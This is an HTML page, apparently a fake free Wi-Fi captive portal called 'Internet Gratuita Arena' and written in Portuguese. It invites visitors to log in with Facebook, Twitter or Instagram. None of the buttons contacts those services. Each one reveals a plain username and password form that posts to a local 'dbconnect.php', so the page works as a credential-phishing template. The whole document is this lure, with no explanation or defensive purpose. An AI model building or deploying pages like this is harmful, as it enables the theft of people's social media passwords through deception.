<!DOCTYPE html>
<html>
<head>
 <title>Internet Gratuita Arena</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

/* style the container */
.container {
  position: relative;
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px 0 30px 0;
} 

/* style inputs and link buttons */
input,
.btn {
  width: 100%;
  padding: 12px;
  border: none;
  border-radius: 4px;
  margin: 5px 0;
  opacity: 0.85;
  display: inline-block;
  font-size: 17px;
  line-height: 20px;
  text-decoration: none; /* remove underline from anchors */
}

input:hover,
.btn:hover {
  opacity: 1;
}

/* add appropriate colors to fb, twitter and google buttons */
.fb {
  background-color: #3B5998;
  color: white;
}

.twitter {
  background-color: #55ACEE;
  color: white;
}

.google {
  background-color: #dd4b39;
  color: white;
}

/* style the submit button */
input[type=submit] {
  background-color: #04AA6D;
  color: white;
  cursor: pointer;
}

input[type=submit]:hover {
  background-color: #45a049;
}

/* Two-column layout */
.col {
  float: left;
  width: 50%;
  margin: auto;
  padding: 0 50px;
  margin-top: 6px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* vertical line */
.vl {
  position: absolute;
  left: 50%;
  transform: translate(-50%);
  border: 2px solid #ddd;
  height: 175px;
}

/* text inside the vertical line */
.vl-innertext {
  position: absolute;
  top: 50%;
  transform: translate(-50%, -50%);
  background-color: #f1f1f1;
  border: 1px solid #ccc;
  border-radius: 50%;
  padding: 8px 10px;
}

/* hide some text on medium and large screens */
.hide-md-lg {
  display: none;
}

/* bottom container */
.bottom-container {
  text-align: center;
  background-color: #666;
  border-radius: 0px 0px 4px 4px;
}

/* Responsive layout - when the screen is less than 650px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 650px) {
  .col {
    width: 100%;
    margin-top: 0;
  }
  /* hide the vertical line */
  .vl {
    display: none;
  }
  /* show the hidden text on small screens */
  .hide-md-lg {
    display: block;
    text-align: center;
  }
}
</style>
<script>
var x = document.getElementById("acesso");
x.style.display = "none";

function myFunction() {
  var x = document.getElementById("acesso");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }
}

</script>

</head>
<body>

<h2>Internet Gratuita da Arena</h2>
<p>Seja bem vindo, sinta-se a vontade para efetuar seu login com suas redes sociais e aproveita para compartilhar. =).</p>

<div class="container">
  <form method="POST" action="dbconnect.php">
    <div class="row">
      <h2 style="text-align:center">Escolha a rede e insira suas credencias para efetuar o login</h2>
      <div class="vl">
        <span class="vl-innertext"></span>
      </div>

      <div class="col">
        <a href="#" class="fb btn" onclick="myFunction()">
          <i class="fa fa-facebook fa-fw"></i> Login com Facebook
         </a>
        <a href="#" class="twitter btn" onclick="myFunction()">
          <i class="fa fa-twitter fa-fw"></i> Login com Twitter
        </a>
        <a href="#" class="google btn" onclick="myFunction()"><i class="fa fa-instagram fa-fw">
          </i> Login com Instagram
        </a>
      </div>

      <div class="col">
        <div class="hide-md-lg">
        </div>
		<div id="acesso" style="display: none;">
        <input type="text" name="username" id="username" placeholder="Username" required="required">
        <input type="password" name="password1" id="password1" placeholder="Password" required="required">
        <input type="submit" value="Login">
        </div>
      </div>
      
    </div>
  </form>
</div>

</body>
</html>
